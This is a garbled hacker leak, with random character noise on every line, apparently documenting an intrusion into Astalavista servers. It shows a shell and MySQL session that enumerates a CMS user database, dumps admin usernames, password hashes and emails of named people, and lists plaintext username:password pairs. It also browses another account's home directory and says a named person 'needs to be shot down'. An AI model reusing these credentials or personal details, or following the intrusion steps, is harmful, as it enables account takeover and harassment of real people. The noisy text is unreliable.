# w+ j3 i6 O/ ?' k1 ^ <link>http://www.astalavista.com/exploits</link>, C% x( k! j1 p( j( _/ |
<description>All availably Exploits.</description>, B4 G- S$ q3 a+ N, o( h: i
<language>en-us</language>
6 j( M" Q$ y; e' P* c: Q9 H <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>% p3 P2 m, s: z0 T6 r8 P! T
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
6 Q2 k7 ~* c: t! N5 t. y9 p% y <generator>Astalavista.com</generator>
+ s6 H# X: w P <webMaster>info@astalavista.com</webMaster>’ . $items . ‘2 c8 \) Q7 r) d# N# N7 a
</channel>, F1 b/ U2 Z. s% d: N
</rss>’;
/ c/ P* H" u/ W P, `* w a) Y( B& K: j
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
( r! @ S4 v; G1 S7 b% E, s unlink (FULLPATH . ‘/feed/exploits.xml’);
( z: m+ H4 Z9 y0 q- r* b# I }! p1 P: V3 f2 x% E! X
3 z" U! x5 W' Z2 e, o7 G file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
' }. V0 e5 |% O$ D( c2 H9 ][snip]2 F4 e8 B4 Q* }" |3 E# k2 B
. F" \5 p' ~7 o. V/ g- E t
sh-3.2$ cat exploits.sh# s5 r& E& {0 o. g
#!/bin/sh$ w! ^7 X8 g/ u7 R2 P+ e$ H k$ a
0 y1 e: G" N* z! i3 |1 S! Z v########################################################### ]) ]# j3 q% m& Y' K
# #
) L# c7 E ?! Z8 d" W& j2 B# _4 C# Title: milw0rm exploits adder #$ g: V" Q* K0 k+ t8 j
# Description: Add all milw0rm exploits to the #
1 m4 K- G$ U* ]5 d/ }# Astalavista.com database #" {4 G) h" D% G q1 u
# #0 j% Q- [8 M1 k- X" [
# Company: Astalavista Group #
2 e8 n9 z# D7 ^7 p) s$ g# Author: Paulo M. Santos #$ t/ [8 U- {4 D( s# u. V2 q. O
# E-Mail: 链接标记paulo.santos@astalavista.ch #1 z1 x5 o9 \; g0 _$ F
# #
- C6 J: }9 M7 {###########################################################' D8 j$ S4 E- y
s$ V6 Z) c+ N b. z' x# path
i7 q) R3 }; R W* e1 C- J2 _7 v+ }this_path=/home/com/public_html/modifications/cronjobs5 _7 L! v. Q* m$ o) R# O% w
9 S) v @, W' @( T% s# M o) D/ W- x
# change directory
/ g; f! o) B0 H; G8 \9 fcd $this_path
0 b: J3 J5 u% w2 \8 x1 U- i Zcd tmp/
' D- \7 }4 L' }( u) r, z- M, `8 ~4 r+ e* _' I1 x$ K
# delete files# Z2 b: {8 s) z) X2 r
rm -rf milw0rm.tar.* & p. V0 \ V( e4 [, |9 L* n$ _
rm -rf milw0rm/ &
- @! I, H" f- {6 E& @5 i H# W- ?
7 j) c& y' a5 O1 e6 W% A, b# wget milw0rm paket; [' E9 }0 p; h) |8 k
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]; V( F$ }; `/ d
6 f' ^+ X3 A# Q# extract milw0rm paket' ~6 h6 ^3 `6 y3 S8 P: H' t! h
tar -xvf milw0rm.tar.bz2
2 J& H- v7 C; o9 y5 y4 A0 P6 [' J1 ?# D3 a; u) n8 C" `/ \
# change owner
* U* F; u R \# s7 Lchown -R com .( H+ W" X% [% `& ?9 ]* A9 I1 a& h
chgrp -R com .6 n I, r+ ~6 | Q& i' E0 G. K) i
6 h) }% ?! s: Z
# execute php script
3 P( x2 K5 Z) ycd $this_path
# h% q% j0 }1 @7 V pphp -q exploits.php' S2 R3 i" I9 U& v
) Q; v* ~, l& w4 ~# delete files
; K0 j1 L3 p! d) s$ P+ D! brm -rf tmp/milw0rm.tar.*
; {3 \3 `. ^; Q- g7 R" `rm -rf tmp/milw0rm/5 E2 I0 v3 k F% `4 |8 o/ C
0 o: i' i$ V6 j) z- a: A$ D
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
9 h1 A) a' }9 J n& k( J: h, OPaulo M. Santos needs to be shot down.
& S% W0 D( z) y0 h) {" w8 Q5 h
% K6 ?1 p; f7 x, lmysql -u contrexxuser2 -p
8 j6 ]# r2 k* \0 S) w; OEnter password:0 x4 p% {. P: Y4 p
Welcome to the MySQL monitor. Commands end with ; or \g.
+ d; @( s' O" f$ ^Your MySQL connection id is 261694
4 `* l9 i. s# ^/ R: ^- @: WServer version: 5.0.45-community-log MySQL Community Edition (GPL); |1 W) B0 d9 a5 T; g ~. S) t
" @4 }% \* T# `
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! j$ s; J$ \7 ]5 U
4 N8 q6 t% s- ?/ y# ^mysql> show databases;) B' _5 L; J, U, }
+——————–+# r9 _. s# Z& x# x; w% [
| Database |' F3 s* b3 p& S1 `5 X% b5 k( w
+——————–+. B/ X3 t+ A! [! `
| information_schema |' E5 W, N6 B' W: U- u r6 U
| com_contrexx2 |% @3 S: x+ r4 n0 u% o! M
| com_contrexx2_live |
. m. P! ]) X6 x8 A0 D| test |
" i$ t" \7 {* m3 y d+ @; z& k+——————–+
8 _" s1 [, p9 F5 ]# `. R4 rows in set (0.00 sec)' W. B5 I" E6 b3 s
; i% ]" c$ r! }7 ]
mysql> use com_contrexx2_live3 K" \- S& m# f0 ^" ]. \
Database changed
- m- @7 \. g- A0 b2 {, s( S5 }7 o1 Gmysql> show tables;
8 f" d3 y' j/ Q" @+————————————————–+3 J0 i( {' H& z* K( K2 j; z+ x
| Tables_in_com_contrexx2_live |9 O- V% r2 y" t. U
+————————————————–+
( K/ V- c$ y u5 l- `: A$ H7 C| cc_banner_counter |
+ w6 l& D0 [2 P% s| cc_search_counter |! Y* U3 {% n9 i
| contrexx_access_group_dynamic_ids |: @6 S) O! x" ^& X* ]* N: ?
| contrexx_access_group_static_ids |5 J9 F% T# n7 Z b+ |) u/ `$ T
| contrexx_access_rel_user_group |
+ v+ {- \' X8 N9 d- V9 N4 r+ n3 R| contrexx_access_settings |
~, p/ m, ]: o6 X' @| contrexx_access_user_attribute |
. Y; y1 }1 H, z& y" M" ]$ g| contrexx_access_user_attribute_name |
1 H& ~9 y' q' X6 | |# T| contrexx_access_user_attribute_value |
7 [, B, |$ O$ z P| contrexx_access_user_core_attribute |
0 ^4 s4 A+ L, x/ ]! f| contrexx_access_user_groups |
* d, M" Y9 k8 g- F7 u9 M| contrexx_access_user_mail |& ^! e9 ~% o8 Y9 R( `6 A
| contrexx_access_user_profile |( ~/ L+ v2 g7 v0 w( M8 |- g" J
| contrexx_access_user_title |( b# L$ K* Z& z7 r( j' P
| contrexx_access_user_validity |
/ i( T: L/ P7 b| contrexx_access_users |
6 V. D! q3 ~, P+ {0 E" X| contrexx_backend_areas |3 j f& @. ?/ {' r+ c% H
| contrexx_backups |, y) y( B7 f! E6 _4 }6 }) d& s, T
| contrexx_content |
7 m7 p$ g; y' h5 C2 o| contrexx_content_history |, R1 o& p- y! S2 {7 K0 N
| contrexx_content_logfile |
) T _7 _% O6 i; T| contrexx_content_navigation |
# X/ k) p: H- ?/ v| contrexx_content_navigation_history |
1 k8 [6 s" i1 Y8 G| contrexx_ids |! r. Y5 b. R2 R# {! F
| contrexx_languages |2 |7 M5 I9 @, S
| contrexx_lib_country |" h) M6 m- [4 j) A
| contrexx_log |: S- D3 r6 n) a1 u. ^# Y) X
| contrexx_module_alias_source |/ P0 v" b% T" N
| contrexx_module_alias_target |
$ D3 k9 Q' [1 K. J6 V+ l; M3 ]( U| contrexx_module_block_blocks |: `) i; a( T; g+ G6 B
| contrexx_module_block_rel_lang |
& C1 ^. p( D \| contrexx_module_block_rel_pages |1 {+ b0 q1 E/ X9 S/ ?! _+ m- p! R
| contrexx_module_block_settings |3 Y, m5 O# D, E. X0 ?4 b2 [
| contrexx_module_blog_categories |9 J, U3 ]0 N t
| contrexx_module_blog_comments |
- H1 N- _7 `. C. O| contrexx_module_blog_message_to_category |% g; v9 N; g# }. D1 i2 s2 d7 @9 t
| contrexx_module_blog_messages |
. `4 _6 {! O1 p2 n& || contrexx_module_blog_messages_lang |0 _, u7 ?( z; g8 i9 D
| contrexx_module_blog_networks |
' k1 f7 N5 x4 A5 U4 `% k+ a| contrexx_module_blog_networks_lang |
: w7 U( m* Z. n9 v. R| contrexx_module_blog_settings |
6 W( a1 }1 a2 G3 M6 H| contrexx_module_blog_votes | {: ^; p3 b7 T# }0 p* f B8 S
| contrexx_module_calendar |
, m B( W% E9 x0 K& Z( r| contrexx_module_calendar_access |
" A4 b O6 Z* D4 C9 c$ F" b8 R| contrexx_module_calendar_categories |
( e! D' M% f7 D- i2 ]$ J| contrexx_module_calendar_form_data |
7 P8 ]& J" Q" L/ ?% u$ i| contrexx_module_calendar_form_fields |- ^( u2 E5 F t& O
| contrexx_module_calendar_registrations |
. n9 j0 o" O ^9 D| contrexx_module_calendar_settings |, l, \; O6 {0 l( Y
| contrexx_module_calendar_style |/ X+ o0 d! o# w q2 z
| contrexx_module_contact_form |
+ r; |5 H' c& _$ Z| contrexx_module_contact_form_data |
% [8 d2 b- K9 v- X" R| contrexx_module_contact_form_field |9 d6 ]& b3 o3 d, C2 }9 z; ?. w
| contrexx_module_contact_settings |
& U4 B% K5 q; l# k, u# D| contrexx_module_data_categories |) [* q, v& h: L6 d# u" A7 M
| contrexx_module_data_message_to_category |5 C5 u& n& x6 |+ s
| contrexx_module_data_messages |
6 M4 c7 D5 Z; y; B| contrexx_module_data_messages_lang |; N$ A9 E1 s# k( @- T
| contrexx_module_data_placeholders |6 R; {9 F+ b; @$ R5 M" \" S/ D' c
| contrexx_module_data_settings |" X# j8 {; R9 d9 m' b
| contrexx_module_directory_access |, s. V# g" C. k( s: O
| contrexx_module_directory_categories |8 ~1 z( I) r7 s2 \& C% f( r9 @7 }1 Z
| contrexx_module_directory_dir |5 i, x) N0 b. D: c) h4 r
| contrexx_module_directory_inputfields |4 S" Z" e$ H. d( o
| contrexx_module_directory_levels |8 M. U% O u' t% f# c
| contrexx_module_directory_mail |; r0 y; F! b! k) E3 k- d. ^. t
| contrexx_module_directory_rel_dir_cat |
6 |5 y- H7 {# f" C3 {" J* u7 h7 \| contrexx_module_directory_rel_dir_level |' L+ G2 g1 {: f' v2 w3 q
| contrexx_module_directory_settings |
) Z9 W/ y0 V( D/ K3 B" _$ d| contrexx_module_directory_settings_google |
) ]5 m1 q. W) I3 O7 `| contrexx_module_directory_vote |. }# G2 }. e& ?4 _% ]- x$ i/ l- F
| contrexx_module_docsys |
! Y8 f) H- B& t/ h2 H) S) Y| contrexx_module_docsys_categories |& h+ M+ |1 q8 i3 C) n/ A/ M5 O
| contrexx_module_egov_configuration |
0 f- J5 I( `- o/ t: f2 || contrexx_module_egov_orders |7 s! ^/ c" {$ X/ S/ v) |0 d
| contrexx_module_egov_product_calendar |% t6 P* ?! i' m, T* L7 i9 ?
| contrexx_module_egov_product_fields |
1 L6 Y' X% e: {2 S l9 \3 b| contrexx_module_egov_products |) h3 g* i6 Y# D) _2 h
| contrexx_module_egov_settings |
M6 a! `1 C4 M7 ?( M# b| contrexx_module_exploits |
8 y; k- g: j5 ]. Y. x' H2 n" N| contrexx_module_exploits_categories |
5 Y0 k3 O& H1 @| contrexx_module_feed_category |
1 w# h2 [2 a# O# A2 u# B6 ^| contrexx_module_feed_news |
; S: M4 z# U$ j4 X1 |& C| contrexx_module_feed_newsml_association |
9 ^1 \( W8 h1 s4 W1 B( u| contrexx_module_feed_newsml_categories |; p5 m5 Z( N7 ~# ?9 ~/ B5 I
| contrexx_module_feed_newsml_documents |' V0 w1 N, D( B2 `1 e' j; v, u
| contrexx_module_feed_newsml_providers |( v6 H/ i: R! p6 u# x
| contrexx_module_forum_access |' X8 s) F! [3 Y H8 Z% w4 m# `
| contrexx_module_forum_categories |, ?" ]0 B# x2 C. p, C7 T3 E" o/ y7 O2 {
| contrexx_module_forum_categories_lang |
. K$ v+ W0 s: q5 g| contrexx_module_forum_notification |( P9 x& k" w" b9 V8 h& I8 d
| contrexx_module_forum_postings |
# C2 d, v6 u5 o& r7 I- G$ L5 c| contrexx_module_forum_rating |
5 v/ r! Q( C2 I# s0 J! K| contrexx_module_forum_settings |
5 I, U1 y, a/ l' r# f/ L Y| contrexx_module_forum_statistics |& }6 j2 k" G& m# A
| contrexx_module_gallery_categories |
, O8 I" \6 f2 F. }1 G1 o2 _| contrexx_module_gallery_comments |
* O* N0 L, J5 I5 T| contrexx_module_gallery_language |
+ Y$ }8 |; P" G| contrexx_module_gallery_language_pics |
n: u0 k7 K4 h5 ]8 Z| contrexx_module_gallery_pictures |. ^$ U+ G+ O) S. N
| contrexx_module_gallery_settings |; q5 X8 u, W" S. z
| contrexx_module_gallery_votes |
; Y1 i7 T2 R7 C6 u; h| contrexx_module_guestbook |) Z* h F( u+ o* ~( x L
| contrexx_module_guestbook_settings |
: D. j, Z$ n0 M. f" N# u| contrexx_module_livecam |
& T' r/ F5 Q( }- R| contrexx_module_livecam_settings |: A7 D3 \! g7 `' q" m( w: d, C
| contrexx_module_market |# M9 c- ~8 d3 V) I- z0 t+ K5 Y9 ~" U5 i
| contrexx_module_market_access |; @9 X, R' _* c1 [4 B: X% s h0 x
| contrexx_module_market_categories |, M+ h- f: T" u9 ~. l
| contrexx_module_market_mail |
; E& \' c; K2 a7 `. T| contrexx_module_market_paypal |
( R1 D1 j3 K/ y1 x) X| contrexx_module_market_settings |6 h% S2 S" U$ B) e
| contrexx_module_market_spez_fields |6 ?2 ~) ^% d; X, q
| contrexx_module_mediadir_access |9 A& K1 ?4 H/ C$ p3 h
| contrexx_module_mediadir_categories |
4 |3 |/ j {. C4 |' o# |- J( K4 ^| contrexx_module_mediadir_comments |
3 q; X/ s' w7 M$ e| contrexx_module_mediadir_dir |
6 @6 V/ ?' q7 w( _| contrexx_module_mediadir_inputfields |4 a' ^6 n! L" \4 z' }' e* p+ ]
| contrexx_module_mediadir_levels |2 v3 q* ]8 |% \1 @# c" h
| contrexx_module_mediadir_mail |4 t J1 O- t5 q
| contrexx_module_mediadir_rel_dir_cat |
2 E7 g4 X' b1 \$ r0 x| contrexx_module_mediadir_rel_dir_level |
: w: X4 i5 J7 |" t! {+ W| contrexx_module_mediadir_reports |8 K) @3 P8 [. `) v4 D, l
| contrexx_module_mediadir_settings |
0 h ?# B( `8 E2 \| contrexx_module_mediadir_settings_google |
_' ~+ c0 Z7 q! ~* E6 G% E| contrexx_module_mediadir_vote |: ]" e: m4 R, d% b% U6 c$ T
| contrexx_module_memberdir_directories |5 S- O0 l. e) A! D' _, J
| contrexx_module_memberdir_name |7 N( J F9 V. [/ G
| contrexx_module_memberdir_settings |
) q( T3 c/ p! }| contrexx_module_memberdir_values |
# G* s C/ M1 l) E* g5 z5 I1 ~| contrexx_module_nettools_allowed_groups |, W& B1 Z6 ?9 x! e$ f- y& @
| contrexx_module_nettools_settings |
/ r; X3 c4 A/ s| contrexx_module_news |4 }6 w, v. `6 z4 ^+ m& G1 ?1 k& I
| contrexx_module_news_access |
8 A+ M6 w7 S% Z$ v| contrexx_module_news_categories |
) \0 A, z5 u& J/ T| contrexx_module_news_settings |
7 X; z1 J2 M' B& \ T| contrexx_module_news_teaser_frame |+ q5 _' X k* k& o- e5 E, J3 B
| contrexx_module_news_teaser_frame_templates |
+ t. z2 G3 g, f+ g1 F| contrexx_module_news_ticker |
+ c7 T1 y5 C9 H| contrexx_module_newsletter |* D* W1 p, p. p; H3 E9 y
| contrexx_module_newsletter_attachment |
: n) R6 E( f( H) ]/ N| contrexx_module_newsletter_category |
- y5 L ]5 u' u- || contrexx_module_newsletter_confirm_mail |8 S' W/ i, z! k" \2 R& O% Y
| contrexx_module_newsletter_rel_cat_news |
7 x% q H4 g( R& C| contrexx_module_newsletter_rel_user_cat |0 R( \0 c' F4 z4 ?; F
| contrexx_module_newsletter_settings |' C. M) \) v2 f6 e6 x- \) v
| contrexx_module_newsletter_template |
7 [( z( W0 r/ i3 t# D& T0 m; f| contrexx_module_newsletter_tmp_sending |
+ ~( }( a$ E* C3 e; Y| contrexx_module_newsletter_user |
+ V9 k" n4 `& |2 s| contrexx_module_newsletter_user_title |
, {8 U) {# e2 [6 A| contrexx_module_onlinetools_defaultports |; [7 T+ m4 m1 f% K+ m
| contrexx_module_onlinetools_defaultports_back |/ K; N: Q* ?) h; F+ n
| contrexx_module_onlinetools_geolitecity_blocks |$ @7 ^" o" q% E& P6 ]0 H4 l6 [2 v
| contrexx_module_onlinetools_geolitecity_country |' s8 O+ g- m- r" I5 {9 l8 B
| contrexx_module_onlinetools_geolitecity_location |; s" @) P+ [$ U/ |) c5 s
| contrexx_module_podcast_category |
- q; e% j8 f/ d/ p$ k| contrexx_module_podcast_medium |
/ r% R0 j7 k1 E0 k) Y8 }1 P6 _2 X| contrexx_module_podcast_rel_category_lang |
6 h p; |# ~: t% c; M; M" C" y6 `| contrexx_module_podcast_rel_medium_category |
" i' v! i5 f: [) o+ q' Y6 O| contrexx_module_podcast_settings |
8 G' F/ C) P5 ?( L| contrexx_module_podcast_template |
& O3 G7 {) Z# A9 A' h0 Z s; S| contrexx_module_proxydb |
4 H5 I8 S. ^6 C' P w( O| contrexx_module_recommend |1 v0 A ]; F- b- H( L# s V
| contrexx_module_repository |0 i9 _" m/ O6 A0 f# Y, K" s" V
| contrexx_module_securitynews_cats |
0 _( g/ s7 {0 l, X% O5 || contrexx_module_securitynews_feeds |/ G! ] |! b8 G2 c+ I* ?
| contrexx_module_securitynews_news |
* ~9 w$ ?$ [' J$ H| contrexx_module_shop_categories |8 b5 Z4 }4 ]3 g( ^: ~9 j
| contrexx_module_shop_config |
! @/ d. `! m" M! }' t" @- ?| contrexx_module_shop_countries |
, o# r X: i( C( g| contrexx_module_shop_currencies |/ {2 O6 D9 q0 O5 U6 k" w2 t
| contrexx_module_shop_customers |# G5 S2 V( [+ x. d( M$ H# z
| contrexx_module_shop_importimg |# t2 b& ~/ @) G P, g
| contrexx_module_shop_lsv |! u' S5 \" M& u: [) I, R4 G) Y
| contrexx_module_shop_mail |! a9 f+ ^$ ?. w; F) h0 L( n0 P" R. }
| contrexx_module_shop_mail_content |( ^ \4 p" ]( F4 |
| contrexx_module_shop_manufacturer |
& c7 \2 l6 {( `: q' S+ h% n7 A# q| contrexx_module_shop_order_items |
. K+ a. |9 d4 o3 F/ g6 V, V" \0 d| contrexx_module_shop_order_items_attributes |
7 l$ G- F. ^& ?0 g7 i' m5 z| contrexx_module_shop_orders |1 ` R- T b: o1 F' M, W
| contrexx_module_shop_payment |
/ i' F# T/ s- t| contrexx_module_shop_payment_processors |
4 C" h7 ?4 J# n8 y| contrexx_module_shop_pricelists |
/ ^! _1 z, h& Z| contrexx_module_shop_products |
3 K0 f* S' b. R" s/ || contrexx_module_shop_products_attributes |3 V/ V$ P4 L& {2 ?. q/ _" O' r+ M
| contrexx_module_shop_products_attributes_name |, u( K# `( F% Z6 t& H( ~
| contrexx_module_shop_products_attributes_value |7 Y# F2 G7 P$ k6 z
| contrexx_module_shop_products_downloads |8 @; \# K% K9 a1 H
| contrexx_module_shop_rel_countries |
9 A) A @8 J+ k+ u- D| contrexx_module_shop_rel_payment |4 t+ j7 r2 @, S# m! Y( b" [( G
| contrexx_module_shop_rel_shipment |/ _( n2 m% A6 f9 c4 e+ l# d6 W
| contrexx_module_shop_shipment_cost |
* |' F! F- {2 d8 F/ W| contrexx_module_shop_shipper | z$ q& R& P8 `) q: L6 E
| contrexx_module_shop_vat |
- o6 f8 I( q0 r: }' @| contrexx_module_shop_zones |
% T. ^, J$ y4 ^8 u| contrexx_module_u2u_address_list |& @: R; w1 A* t" L/ l4 `% Y
| contrexx_module_u2u_message_log |
; ~& s5 N) K. H% [1 f| contrexx_module_u2u_sent_messages |
, k: H! ^3 }5 J, O: }8 A C| contrexx_module_u2u_settings |/ A6 T. ?3 M4 e3 S+ Y( x* y
| contrexx_module_u2u_user_log |
% [7 v9 t8 F4 P: T" l% Q9 x G9 ~| contrexx_modules |
; \3 ?, M- S& N! {7 f| contrexx_sessions |$ k" B( w2 b( j% M1 j4 i' W H
| contrexx_settings |7 U2 o3 t0 q/ E/ z" s2 E: U
| contrexx_settings_smtp |, C- f1 r2 c1 J* t; f4 v
| contrexx_skins |
# I/ _1 V9 a' S' |' G7 b) d| contrexx_stats_browser |' E" Z( e- \2 O3 j8 ^
| contrexx_stats_colourdepth |4 R: G/ c0 [5 P. a7 N+ N
| contrexx_stats_config |
& a% x; [) E5 r| contrexx_stats_country |
, F* {! X8 `9 G| contrexx_stats_hostname |
; o4 r! T2 F( H& k* W+ [6 G| contrexx_stats_javascript |
2 r7 `7 m8 X/ A7 y, p| contrexx_stats_operatingsystem |
& Q' D; g. E) `, c/ b' c| contrexx_stats_referer |# l7 Q8 K9 N8 @" N m
| contrexx_stats_requests |+ D- y Z9 q4 D; F0 ]! R4 r/ r7 m
| contrexx_stats_requests_summary |9 `, o( @7 q b, h2 r" U
| contrexx_stats_screenresolution |1 n8 D- F% U$ O
| contrexx_stats_search |
. t9 f9 |, ^3 k) X; o& L8 G7 e| contrexx_stats_spiders |
4 W$ _, `7 A& y% |3 g| contrexx_stats_spiders_summary |
) f8 l; t& a( a; k g| contrexx_stats_visitors |
& b5 ]5 E* o' Z! w% D| contrexx_stats_visitors_summary |" h5 A4 t" _; j
| contrexx_voting_additionaldata |/ T2 O# \: a' w% U* [: j2 J
| contrexx_voting_email |
/ l8 O& v2 P( w, k$ _% i, c| contrexx_voting_rel_email_system |& e4 l3 D9 K' s3 O- `0 ]" T
| contrexx_voting_results |
& J& {& p) ~ p/ {" A. l. T| contrexx_voting_system |8 w* m! u5 a$ V% j
| foo |; H( X- [" Q: L
+————————————————–+7 W. y4 Q! q( z
227 rows in set (0.01 sec)* F! ]7 ^2 U$ s9 ^5 h0 ^/ C1 a! e
6 ]1 X+ V7 B! W* X8 G7 nmysql> select count(*) as skids from contrexx_access_users;
, R: {+ B; v! [" k5 k/ o; L* W! I+——-+
* k- P, ]/ Q8 s. t" s| skids |
7 Z6 C9 K6 L& z/ C: B V, Y+——-+1 M5 i" u- Y+ k; J( @
| 53699 |
) i2 g" C: | U# w* I3 X+——-+$ b8 v8 K# b. h9 w! F
1 row in set (0.00 sec) F5 q1 _4 F, I; E4 r2 l7 n
$ h9 L# l# V, g2 d! t/ D \+ { ?) {mysql> describe contrexx_access_users;' P$ {% {# Q4 w4 u+ @ o0 q
+——————+——————————————+——+—–+————–+—————-+
4 k; Y" c, n) r/ y9 E: x. b| Field | Type | Null | Key | Default | Extra |
' T, Q0 p, y8 t% z& |+——————+——————————————+——+—–+————–+—————-+
W3 w. I! j8 q. N {) O& w| id | int(10) unsigned | NO | PRI | NULL | auto_increment |( a( z- m F! {* c( F0 w6 j3 k
| is_admin | tinyint(1) unsigned | NO | | 0 | |# y' e" Y8 V1 O
| username | varchar(40) | YES | MUL | NULL | |
; o& m2 S2 }5 O| password | varchar(32) | YES | | NULL | |( x9 d" Y3 a/ Y4 b: f
| regdate | int(14) unsigned | NO | | 0 | |
4 Q4 D+ ], K5 }) d8 H| expiration | int(14) unsigned | NO | | 0 | |
) T F. U# u& c5 }| validity | int(10) unsigned | NO | | 0 | |
( m3 l: c, ]6 @0 I) p- l| last_auth | int(14) unsigned | NO | | 0 | |
' F6 h% `+ g8 k9 y) S8 c7 {| last_activity | int(14) unsigned | NO | | 0 | |( e2 Y, w x9 k
| email | varchar(255) | YES | | NULL | |
2 x3 l+ U1 Z2 i; v% F5 k8 ^9 B| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |5 ~1 p0 @/ u+ K; g3 z
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
* }1 O+ b% j- N4 ~9 I5 I9 ^) T| backend_lang_id | int(2) unsigned | NO | | 0 | |
& x3 K# N$ L& {5 I/ c| active | tinyint(1) | NO | | 0 | |( I a- [* D. z" ]1 W* b1 R/ y
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
G: X. U7 M" r3 E& n9 g8 B, l| restore_key | varchar(32) | NO | | | |
# U6 N7 L8 G% u: p: t| restore_key_time | int(14) unsigned | NO | | 0 | |: ?1 o" M- w/ p
| u2u_active | enum(’0′,’1′) | NO | | 1 | |* f1 p) F. t# G6 n
+——————+——————————————+——+—–+————–+—————-+
, K% h2 L+ l, E% p8 G18 rows in set (0.00 sec)4 M/ k1 ^7 U5 p
7 g6 ?2 C( ~! s; y' amysql> select username,password,email from contrexx_access_users where is_admin = 1;
( s" C6 t' I: V7 u: w) ?+————+———————————-+—————————–++ Z+ D3 a# [% M7 w& H1 P
| username | password | email |
& d: C* K9 t+ E2 l; x+————+———————————-+—————————–+
1 ]. u7 J$ k4 q7 I) o| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
$ L. O( [# W6 V$ K9 K! e| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |7 ~, E. E1 ^3 \0 g8 _
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |* D( K. y V+ q- f6 A" ^& n5 H
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |2 B3 v- Y, @8 b
+————+———————————-+—————————–+( o+ F' i' q7 l7 Z: B& D
4 rows in set (0.04 sec)% y/ |* q+ Z1 n
1 O$ z$ a' H& _ ~3 o* v4 q
mysql> exit;' D/ M1 g/ j: O
Bye5 v" u/ ^6 e6 y ^
3 I- N _' U, D/ X[~] There you go, your “team of security and IT professionals” is a joke.( \& g" I; @. z2 i- k' }
! A& n6 z; q! S" k
+——————————+
2 `: l8 W; t) M+ R' Jsystem:f82BN3+_*
- B% r+ s$ z' @3 x a1 `' RBe1er0ph0r:belerophor4astacom7 K6 l6 T+ d5 t
prozac:asta4cms!! y! l7 O# I1 b) N" s6 [
commander:mpbdaagf6m
+ |6 x5 y* |. V, isykadul:ak29eral
& n7 b7 G- L* w+——————————+
: h3 ?% x& T& p6 N" v* j* F! y
: x' ]) _, l0 F' X[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)% Y# q, J, C0 ]* A: [0 A7 n3 u
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
5 m% T! ^$ |/ N4 B- ? f' ]' ?& ?+ J( _* G0 H& A* [, I
[~] Lets move to astalavista.net now,& S4 D0 p; H* L. r" q3 |
( h0 U* M; y# p
From <链接标记[url]https://www.astalavista.net/[/url]>:8 ?: T, U# B; |1 ~2 \: F5 _0 x& `: [
>> Everyone knows that the best defense is a good offense.9 d' K7 ^# ?* w; \" |9 T% h
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.. Z7 |! F1 l* S7 H; c& E# X
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
0 R: k& ]$ k. g2 x7 b$ ]2 Y$ H>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”/ `! }, z5 P& m ~! p& F$ m/ d
7 e3 E* c$ j; }" C: p5 g>> Go ahead, try and hack our server . in a completely legal way!6 D7 Y# ` Q; t
>> Learn by doing: We offer our members tricky tasks and challenges on an
+ S. s( j, v3 B) {6 d>> ongoing basis so you can test your knowledge and abilities. You can also4 l9 ] t' T( c7 u) Q
>> demonstrate what you.ve mastered by taking part in regular hacker contests( I* ^6 N- r" e) B# z
>> and war games' _. A7 _1 U0 X
2 C: x2 _3 g- C. F6 b) V9 i[~] Lets take a look there, after all… they are hack-proof, aren’t they?!, L# ^, a4 H$ G/ O
W" M1 l* }- V' A5 K% `+ H' `" S
[-] Tricky task: Find home dir of astalavista.net
, n# e9 s# l! k9 |' j
8 E1 g+ x+ s7 t) L" ^% Z+ Q9 J' p% zsh-3.2$ ls -la ~astanet
! Z7 u, j/ |6 L5 j$ M: Ytotal 48
1 [/ R* C; E; j- O$ q% y$ wdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .3 S5 \( X9 P: w' e. c1 m* Y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. f. P( \6 _# v& I" S9 d, \
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
& ]5 z; Q* J2 K& I. n-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history- \: P1 j9 I2 q6 Q2 u$ l
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- ]2 q* I% n/ R' M* l! e-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile7 u7 _- x% _! i! A
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc& r4 ^+ A6 L; S3 P- W- i8 @
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains r4 f1 t* ~! y) X3 P
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
7 {6 j5 V# }; g: qdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail$ `7 Q" Q; S |1 N/ ~2 R
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html) W1 o& C$ U: S' q& ^
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
7 b5 w+ _6 w/ j, |9 f% g/ Z8 i$ @. i0 q" q1 h
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/! C5 G/ b1 }2 }+ A& d! L+ s
sh-3.2$ ls -la
0 Y$ {: j" C. W$ Ctotal 200: i/ v1 ]* E; Y2 w h
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .' _' I- _9 n% V' L( \
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..) R6 A& R: x+ n7 T. P: W, v, |
